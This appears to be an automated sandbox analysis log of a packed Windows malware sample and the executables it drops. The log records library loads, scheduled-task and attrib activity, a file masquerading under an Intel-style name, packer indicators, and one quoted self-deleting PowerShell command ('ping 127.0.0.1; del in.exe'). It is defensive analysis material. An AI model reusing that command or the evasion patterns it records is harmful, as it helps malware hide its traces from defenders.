Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 3032576 > 1048576

Source: file.exe

Static PE information: Raw size of hjveylar is bigger than: 0x100000 < 0x2b2c00

Source:	Binary string: Unhook.pdb source: RzAAR0y.exe, 0000000B.00000002.4692082681.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp, RzAAR0y.exe, 0000000B.00000000.2790737030.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: 2gwmtZs.exe, 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 9.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Unpacked PE file: 10.2.2gwmtZs.exe.7ff60a9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;omdapsrn:EW;ehlcdwxw:EW;.pdata:R;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;omdapsrn:EW;ehlcdwxw:EW;.pdata:R;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Unpacked PE file: 52.2.950932ab59.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe

Source: random[2].exe1.9.dr

Static PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[2].exe0.9.dr	Static PE information: real checksum: 0x0 should be: 0xc8597
Source: 224de4e34e.exe.9.dr	Static PE information: real checksum: 0x1d0d19 should be: 0x1d759f
Source: b93717638f.exe.9.dr	Static PE information: real checksum: 0x44792d should be: 0x43f371
Source: 003.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x2ed9d8
Source: random[4].exe.9.dr	Static PE information: real checksum: 0x2ba72a should be: 0x2c0344
Source: 22b355416f.exe.9.dr	Static PE information: real checksum: 0x2ba72a should be: 0x2c0344
Source: 92133eb3c2.exe.9.dr	Static PE information: real checksum: 0x1e3188 should be: 0x1dd217
Source: random[2].exe1.9.dr	Static PE information: real checksum: 0x0 should be: 0x14b59
Source: random[3].exe0.9.dr	Static PE information: real checksum: 0x1d0d19 should be: 0x1d759f
Source: random[2].exe.9.dr	Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: 003[1].exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x2ed9d8
Source: 2002c77d6d.exe.9.dr	Static PE information: real checksum: 0x2b36ea should be: 0x2abb42
Source: 22b0b7688f.exe.9.dr	Static PE information: real checksum: 0x43f82e should be: 0x44cc74
Source: random[1].exe.9.dr	Static PE information: real checksum: 0x43f82e should be: 0x44cc74
Source: 950932ab59.exe.9.dr	Static PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
Source: random[4].exe0.9.dr	Static PE information: real checksum: 0x0 should be: 0x11353a
Source: ca733a156b.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0xc8597
Source: 08b7ae794c.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x14b59
Source: random[1].exe0.9.dr	Static PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
Source: random[3].exe.9.dr	Static PE information: real checksum: 0x44792d should be: 0x43f371
Source: random[2].exe2.9.dr	Static PE information: real checksum: 0x1e3188 should be: 0x1dd217
Source: file.exe	Static PE information: real checksum: 0x2edeae should be: 0x2eae58
Source: random[3].exe1.9.dr	Static PE information: real checksum: 0x2b36ea should be: 0x2abb42
Source: skotes.exe.1.dr	Static PE information: real checksum: 0x2edeae should be: 0x2eae58

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: hjveylar
Source: file.exe	Static PE information: section name: feaxxngf
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.1.dr	Static PE information: section name:
Source: skotes.exe.1.dr	Static PE information: section name: .idata
Source: skotes.exe.1.dr	Static PE information: section name: hjveylar
Source: skotes.exe.1.dr	Static PE information: section name: feaxxngf
Source: skotes.exe.1.dr	Static PE information: section name: .taggant
Source: random[1].exe.9.dr	Static PE information: section name:
Source: random[1].exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.9.dr	Static PE information: section name:
Source: random[1].exe.9.dr	Static PE information: section name: hkbprtow
Source: random[1].exe.9.dr	Static PE information: section name: nzqpevfi
Source: random[1].exe.9.dr	Static PE information: section name: .taggant
Source: 22b0b7688f.exe.9.dr	Static PE information: section name:
Source: 22b0b7688f.exe.9.dr	Static PE information: section name: .idata
Source: 22b0b7688f.exe.9.dr	Static PE information: section name:
Source: 22b0b7688f.exe.9.dr	Static PE information: section name: hkbprtow
Source: 22b0b7688f.exe.9.dr	Static PE information: section name: nzqpevfi
Source: 22b0b7688f.exe.9.dr	Static PE information: section name: .taggant
Source: random[2].exe.9.dr	Static PE information: section name: .eh_fram
Source: random[1].exe0.9.dr	Static PE information: section name:
Source: random[1].exe0.9.dr	Static PE information: section name: .idata
Source: random[1].exe0.9.dr	Static PE information: section name:
Source: random[1].exe0.9.dr	Static PE information: section name: lzigcvvj
Source: random[1].exe0.9.dr	Static PE information: section name: pdsqmwos
Source: random[1].exe0.9.dr	Static PE information: section name: .taggant
Source: 950932ab59.exe.9.dr	Static PE information: section name:
Source: 950932ab59.exe.9.dr	Static PE information: section name: .idata
Source: 950932ab59.exe.9.dr	Static PE information: section name:
Source: 950932ab59.exe.9.dr	Static PE information: section name: lzigcvvj
Source: 950932ab59.exe.9.dr	Static PE information: section name: pdsqmwos
Source: 950932ab59.exe.9.dr	Static PE information: section name: .taggant
Source: random[3].exe.9.dr	Static PE information: section name:
Source: random[3].exe.9.dr	Static PE information: section name: .idata
Source: random[3].exe.9.dr	Static PE information: section name:
Source: random[3].exe.9.dr	Static PE information: section name: lvbdatvl
Source: random[3].exe.9.dr	Static PE information: section name: bclfnnmn
Source: random[3].exe.9.dr	Static PE information: section name: .taggant
Source: b93717638f.exe.9.dr	Static PE information: section name:
Source: b93717638f.exe.9.dr	Static PE information: section name: .idata
Source: b93717638f.exe.9.dr	Static PE information: section name:
Source: b93717638f.exe.9.dr	Static PE information: section name: lvbdatvl
Source: b93717638f.exe.9.dr	Static PE information: section name: bclfnnmn
Source: b93717638f.exe.9.dr	Static PE information: section name: .taggant
Source: random[2].exe2.9.dr	Static PE information: section name:
